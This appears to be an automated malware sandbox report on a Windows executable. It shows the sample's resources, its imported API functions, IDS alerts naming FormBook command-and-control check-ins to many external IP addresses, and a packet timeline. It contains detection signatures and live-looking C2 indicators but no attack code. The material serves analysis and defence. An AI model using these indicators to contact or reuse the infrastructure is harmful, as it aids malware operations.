                                                        RT_STRING0xdb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xdb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xdbe500x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xdc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xdc4100xadf12data1.000317208119405
                                                        RT_GROUP_ICON0x18a3240x76dataEnglishGreat Britain0.6610169491525424
                                                        RT_GROUP_ICON0x18a39c0x14dataEnglishGreat Britain1.15
                                                        RT_VERSION0x18a3b00xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x18a48c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                        DLLImport
                                                        WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                        MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                        WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                        USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                        USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                        GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                        SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                        OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-04T10:10:15.841217+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449730TCP
                                                        2024-11-04T10:10:51.878537+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736195.154.200.1580TCP
                                                        2024-11-04T10:10:51.878537+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449736195.154.200.1580TCP
                                                        2024-11-04T10:10:55.709492+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.449737TCP
                                                        2024-11-04T10:11:07.738394+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449789199.59.243.22780TCP
                                                        2024-11-04T10:11:07.738394+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.449789199.59.243.22780TCP
                                                        2024-11-04T10:11:10.289723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449805199.59.243.22780TCP
                                                        2024-11-04T10:11:12.913203+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449820199.59.243.22780TCP
                                                        2024-11-04T10:11:15.422529+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449836199.59.243.22780TCP
                                                        2024-11-04T10:11:15.422529+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449836199.59.243.22780TCP
                                                        2024-11-04T10:11:21.224442+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449870162.0.215.24480TCP
                                                        2024-11-04T10:11:23.749539+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449884162.0.215.24480TCP
                                                        2024-11-04T10:11:26.346988+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449900162.0.215.24480TCP
                                                        2024-11-04T10:11:28.863331+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449912162.0.215.24480TCP
                                                        2024-11-04T10:11:28.863331+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449912162.0.215.24480TCP
                                                        2024-11-04T10:11:35.035209+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449940104.21.3.14480TCP
                                                        2024-11-04T10:11:37.604280+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449953104.21.3.14480TCP
                                                        2024-11-04T10:11:40.092181+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449965104.21.3.14480TCP
                                                        2024-11-04T10:11:42.714914+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449978104.21.3.14480TCP
                                                        2024-11-04T10:11:42.714914+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449978104.21.3.14480TCP
                                                        2024-11-04T10:11:49.292599+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45000876.223.67.18980TCP
                                                        2024-11-04T10:11:50.971334+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001676.223.67.18980TCP
                                                        2024-11-04T10:11:54.574030+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001776.223.67.18980TCP
                                                        2024-11-04T10:11:56.260992+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001876.223.67.18980TCP
                                                        2024-11-04T10:11:56.260992+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45001876.223.67.18980TCP
                                                        2024-11-04T10:12:02.827581+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500193.33.130.19080TCP
                                                        2024-11-04T10:12:05.370921+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500203.33.130.19080TCP
                                                        2024-11-04T10:12:07.920945+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500213.33.130.19080TCP
                                                        2024-11-04T10:12:10.521608+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500223.33.130.19080TCP
                                                        2024-11-04T10:12:10.521608+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500223.33.130.19080TCP
                                                        2024-11-04T10:12:16.425876+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002384.32.84.3280TCP
                                                        2024-11-04T10:12:18.969660+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002484.32.84.3280TCP
                                                        2024-11-04T10:12:21.498423+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002584.32.84.3280TCP
                                                        2024-11-04T10:12:24.065523+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002684.32.84.3280TCP
                                                        2024-11-04T10:12:24.065523+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002684.32.84.3280TCP
                                                        2024-11-04T10:12:29.975186+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450027162.0.231.20380TCP
                                                        2024-11-04T10:12:33.277137+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028162.0.231.20380TCP
                                                        2024-11-04T10:12:35.032477+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029162.0.231.20380TCP
                                                        2024-11-04T10:12:37.587933+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450030162.0.231.20380TCP
                                                        2024-11-04T10:12:37.587933+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450030162.0.231.20380TCP
                                                        2024-11-04T10:12:43.965166+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450031150.95.254.1680TCP
                                                        2024-11-04T10:12:46.548134+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032150.95.254.1680TCP
                                                        2024-11-04T10:12:49.047483+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450033150.95.254.1680TCP
                                                        2024-11-04T10:12:51.585839+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450034150.95.254.1680TCP
                                                        2024-11-04T10:12:51.585839+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450034150.95.254.1680TCP
                                                        2024-11-04T10:12:58.308368+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500353.33.130.19080TCP
                                                        2024-11-04T10:12:59.961740+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500363.33.130.19080TCP
                                                        2024-11-04T10:13:03.418080+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500373.33.130.19080TCP
                                                        2024-11-04T10:13:12.177218+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500383.33.130.19080TCP
                                                        2024-11-04T10:13:12.177218+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500383.33.130.19080TCP
                                                        2024-11-04T10:13:17.958577+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450039199.59.243.22780TCP
                                                        2024-11-04T10:13:20.518298+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450040199.59.243.22780TCP
                                                        2024-11-04T10:13:23.439968+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450041199.59.243.22780TCP
                                                        2024-11-04T10:13:26.300452+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450042199.59.243.22780TCP
                                                        2024-11-04T10:13:26.300452+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450042199.59.243.22780TCP
                                                        2024-11-04T10:13:32.386564+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450043217.160.0.11180TCP
                                                        2024-11-04T10:13:34.981741+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450044217.160.0.11180TCP
                                                        2024-11-04T10:13:37.485727+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450045217.160.0.11180TCP
                                                        2024-11-04T10:13:39.985829+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450046217.160.0.11180TCP
                                                        2024-11-04T10:13:39.985829+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450046217.160.0.11180TCP
                                                        2024-11-04T10:13:46.766436+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450047168.76.221.25280TCP
                                                        2024-11-04T10:13:49.305846+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048168.76.221.25280TCP
                                                        2024-11-04T10:13:51.683850+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450049168.76.221.25280TCP
                                                        2024-11-04T10:13:54.517791+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450050168.76.221.25280TCP
                                                        2024-11-04T10:13:54.517791+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450050168.76.221.25280TCP
                                                        2024-11-04T10:14:00.641081+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450051185.179.189.19380TCP
                                                        2024-11-04T10:14:03.717669+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450052185.179.189.19380TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 4, 2024 10:10:50.330051899 CET4973680192.168.2.4195.154.200.15
                                                        Nov 4, 2024 10:10:50.335238934 CET8049736195.154.200.15192.168.2.4
                                                        Nov 4, 2024 10:10:50.335333109 CET4973680192.168.2.4195.154.200.15
                                                        Nov 4, 2024 10:10:50.343189001 CET4973680192.168.2.4195.154.200.15
                                                        Nov 4, 2024 10:10:50.348062038 CET8049736195.154.200.15192.168.2.4
                                                        Nov 4, 2024 10:10:51.878318071 CET8049736195.154.200.15192.168.2.4
                                                        Nov 4, 2024 10:10:51.878428936 CET8049736195.154.200.15192.168.2.4
                                                        Nov 4, 2024 10:10:51.878536940 CET4973680192.168.2.4195.154.200.15
                                                        Nov 4, 2024 10:10:51.989078999 CET8049736195.154.200.15192.168.2.4
                                                        Nov 4, 2024 10:10:51.989195108 CET4973680192.168.2.4195.154.200.15
                                                        Nov 4, 2024 10:10:51.992472887 CET4973680192.168.2.4195.154.200.15
                                                        Nov 4, 2024 10:10:51.997287989 CET8049736195.154.200.15192.168.2.4
                                                        Nov 4, 2024 10:11:07.105916977 CET4978980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:07.110855103 CET8049789199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:07.110938072 CET4978980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:07.122508049 CET4978980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:07.127355099 CET8049789199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:07.738226891 CET8049789199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:07.738344908 CET8049789199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:07.738394022 CET4978980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:07.739013910 CET8049789199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:07.739162922 CET4978980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:08.639290094 CET4978980192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:09.655597925 CET4980580192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:09.661212921 CET8049805199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:09.661382914 CET4980580192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:09.673387051 CET4980580192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:09.678850889 CET8049805199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:10.289351940 CET8049805199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:10.289648056 CET8049805199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:10.289722919 CET4980580192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:10.289786100 CET8049805199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:10.289829969 CET4980580192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:11.216783047 CET4980580192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:12.240969896 CET4982080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:12.246649981 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.246747971 CET4982080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:12.258321047 CET4982080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:12.263596058 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.263607979 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.263642073 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.263652086 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.263689041 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.263698101 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.263746977 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.263756037 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.264189005 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.913022041 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.913151979 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.913203001 CET4982080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:12.913371086 CET8049820199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:12.913428068 CET4982080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:13.761296988 CET4982080192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:14.780360937 CET4983680192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:14.785319090 CET8049836199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:14.785398006 CET4983680192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:14.793687105 CET4983680192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:14.798666954 CET8049836199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:15.422292948 CET8049836199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:15.422429085 CET8049836199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:15.422528982 CET4983680192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:15.422786951 CET8049836199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:15.422837019 CET4983680192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:15.425203085 CET4983680192.168.2.4199.59.243.227
                                                        Nov 4, 2024 10:11:15.430062056 CET8049836199.59.243.227192.168.2.4
                                                        Nov 4, 2024 10:11:20.535512924 CET4987080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:20.540678024 CET8049870162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:20.540802956 CET4987080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:20.552159071 CET4987080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:20.557219028 CET8049870162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:21.224293947 CET8049870162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:21.224405050 CET8049870162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:21.224442005 CET4987080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:21.224684000 CET8049870162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:21.224695921 CET8049870162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:21.224742889 CET4987080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:21.225094080 CET8049870162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:21.261717081 CET8049870162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:21.261780024 CET4987080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:22.058303118 CET4987080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:23.076833963 CET4988480192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:23.081830025 CET8049884162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:23.081892967 CET4988480192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:23.093401909 CET4988480192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:23.098373890 CET8049884162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:23.749346018 CET8049884162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:23.749455929 CET8049884162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:23.749468088 CET8049884162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:23.749538898 CET4988480192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:23.749836922 CET8049884162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:23.749850988 CET8049884162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:23.749861956 CET8049884162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:23.749886036 CET4988480192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:23.749907970 CET4988480192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:23.789032936 CET8049884162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:23.789098978 CET4988480192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:24.605129957 CET4988480192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:25.623616934 CET4990080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:25.628571987 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:25.628736973 CET4990080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:25.646097898 CET4990080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:25.651053905 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:25.651087999 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:25.651099920 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:25.651110888 CET8049900162.0.215.244192.168.2.4
